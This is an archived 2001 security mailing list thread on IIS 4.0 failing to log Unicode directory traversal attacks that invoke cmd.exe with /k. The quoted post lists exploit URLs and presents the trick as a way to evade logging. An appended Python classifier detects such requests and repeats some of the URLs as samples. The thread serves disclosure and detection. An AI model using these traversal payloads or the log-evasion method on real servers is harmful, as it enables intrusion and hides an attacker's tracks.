The problem looks like this:

CMD /K [command]   Execute a command and "remain active"
CMD /C [command]   Execute a command and then finish.

If you execute a cmd.exe?/k request, it stays in an active state until it has finished the process, unlike the cmd.exe?/c request, which finishes the process immediately. Because of this, IIS does not log a process that has not come to an end.

Regards,

Pablo Aravena Martínez
Security Consultant
BYSECURE CSE S.A.
PGP FingerPrint: 4109 41C1 A295 75D8 F159 D542 96C5 5E6D 2B08 F28A
http://www.bysecure.com
mailto:p.aravenaat_private

> -----Original Message-----
> From: ThEye [SMTP:theyeat_private]
> Sent: Thursday, December 20, 2001 0:39
> To: vuln-devat_private
> CC: ndr113at_private
> Subject: sometimes IIS 4.0 don't write logs.
>
> Hi:
>
> I don't know if this problem is documented but I didn't find anything
> about it anywhere.
>
> The problem is the following one:
>
> + Problem:
> When I was playing with "Microsoft IIS and PWS Extended Unicode Directory
> Traversal Vulnerability" (BugtraqID = 1806) I found that if the attacker
> uses the "k" option of cmd (cmd /k) instead of the "c" option (cmd /c),
> IIS 4.0 (with the Extended Unicode Directory Traversal Vulnerability)
> sometimes doesn't write logs of the attacker's activity.
>
> + Implications:
> If an attacker uses this vulnerability to crack a web page or anything,
> eventually no tracks will exist on the attacked server.
>
> + Final:
> In PROBLEM I said "sometimes" because after a high number of requests to
> "cmd /k", IIS 4.0 writes logs of some requests; still, I don't know when
> and why IIS 4.0 writes logs of the "cmd /k" request.
> Anyone who can confirm or refute this, please post it.
>
> + Exploit:
> I tested this problem on Windows NT Server 4.0 with IIS 4.0 just installed
> (without any patch).
>
> http://server.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/k+dir
> http://server.com/scripts/..%c0%af../winnt/system32/cmd.exe?/k+dir
> http://server.com/msadc/..%c1%pc../winnt/system32/cmd.exe?/k+dir
> http://server.com/msadc/..%c0%af../winnt/system32/cmd.exe?/k+dir
>
> Result: No tracks on log files.
>
> + More Information:
> 1) Microsoft IIS and PWS Extended Unicode Directory Traversal
>    http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id=1806
> 2) Microsoft Patch prmcan4i
>    http://download.microsoft.com/download/winntsp/Patch/q269862/NT4ALPHA/EN-US/prmcan4i.exe
>
> Roberto Alamos M. (theyeat_private)
> www.350cc.com
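The thread above argues that a cmd.exe?/k request leaves the shell resident, so the request never completes and the IIS log entry, which is written at completion, may never appear. The consequence for a defender is that detection cannot rely on the W3C logs of the attacked server; it has to run over request data captured elsewhere (a reverse proxy, a sniffer, a proxy log). The script below is an added example written for this page, not code from either poster. It emulates the lax two-byte UTF-8 decoding that made the Unicode traversal work (an overlong %c0%af decodes to '/', %c1%1c to '\'; the %c1%1c form is assumed from the BugtraqID 1806 advisory), resolves the decoded path against the web root to see whether it escapes, and classifies cmd.exe invocations by their switch so that the /k form the thread describes is flagged separately from /c. The sample request URLs are constructed for the example; the decoder approximates IIS 4.0 behaviour and is not taken from its source.

```python
"""Offline classifier for IIS 4.0-style Unicode traversal requests.

Added example for this thread, not code from the original posters.
Assumptions: overlong two-byte sequences (%c0%af -> '/', %c1%1c -> '\\')
are decoded the way IIS 4.0 decoded them, and the sample URLs below are
constructed, not captured traffic.
"""
from urllib.parse import urlsplit

HEX = "0123456789abcdefABCDEF"


def _tokens(s):
    """Split a path into literal characters and %XX bytes (as ints).
    An invalid escape such as %zz is kept as literal text, which is
    also what keeps a mistyped sequence from decoding into a traversal."""
    out, i = [], 0
    while i < len(s):
        pair = s[i + 1:i + 3]
        if s[i] == "%" and len(pair) == 2 and all(c in HEX for c in pair):
            out.append(int(pair, 16))
            i += 3
        else:
            out.append(s[i])
            i += 1
    return out


def lax_percent_decode(s):
    """Decode like IIS 4.0 did: a 0xC0/0xC1 lead byte followed by any other
    escaped byte is treated as a two-byte UTF-8 sequence, although the
    encoding is overlong and the second byte need not be a valid
    continuation byte. %c0%af therefore becomes '/', %c1%1c becomes '\\'."""
    toks = _tokens(s)
    out, i = [], 0
    while i < len(toks):
        t = toks[i]
        if isinstance(t, int):
            nxt = toks[i + 1] if i + 1 < len(toks) else None
            if t in (0xC0, 0xC1) and isinstance(nxt, int):
                out.append(chr(((t & 0x1F) << 6) | (nxt & 0x3F)))
                i += 2
                continue
            out.append(chr(t))
        else:
            out.append(t)
        i += 1
    return "".join(out)


def resolve_against_root(decoded_path):
    """Walk the decoded path treating '/' and '\\' alike. Returns
    (levels_above_root, normalized): how many '..' segments popped past
    the web root, and the path that remains."""
    stack, above = [], 0
    for seg in decoded_path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                above += 1
        else:
            stack.append(seg)
    return above, "/" + "/".join(stack)


def analyze(url):
    """Classify one request URL. Verdicts: clean, traversal, cmd-/c, cmd-/k."""
    parts = urlsplit(url)
    decoded = lax_percent_decode(parts.path)
    above, normalized = resolve_against_root(decoded)
    args = [a for a in parts.query.split("+") if a]
    target = normalized.rsplit("/", 1)[-1].lower()
    verdict, note = "clean", ""
    if above and target == "cmd.exe":
        switch = args[0].lower() if args else ""
        if switch == "/k":
            verdict = "cmd-/k"
            note = "shell stays resident; request never completes, so IIS may never log it"
        else:
            verdict = "cmd-/c"
            note = "shell exits after the command; request completes and is logged normally"
    elif above:
        verdict, note = "traversal", "path escapes the web root"
    return {"url": url, "decoded_path": decoded, "levels_above_root": above,
            "normalized": normalized, "args": args, "verdict": verdict, "note": note}


# Constructed sample requests (not captured traffic).
SAMPLE_REQUESTS = [
    "http://server.com/scripts/..%c0%af../winnt/system32/cmd.exe?/k+dir",
    "http://server.com/msadc/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\\",
    "http://server.com/default.asp",
    "http://server.com/scripts/..%zz../winnt/system32/cmd.exe?/k+dir",
]


def scan(urls):
    return [analyze(u) for u in urls]


if __name__ == "__main__":
    for r in scan(SAMPLE_REQUESTS):
        print(r["verdict"].ljust(10), r["normalized"], r["note"])
```

Run it as-is to see the four verdicts; feed it a column of request URLs from a proxy log to triage a real capture. The cmd-/k verdict is the one worth alerting on even when the server's own log shows nothing, which is exactly the gap the thread describes.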
This archive was generated by hypermail 2b30 : Thu Dec 20 2001 - 09:06:09 PST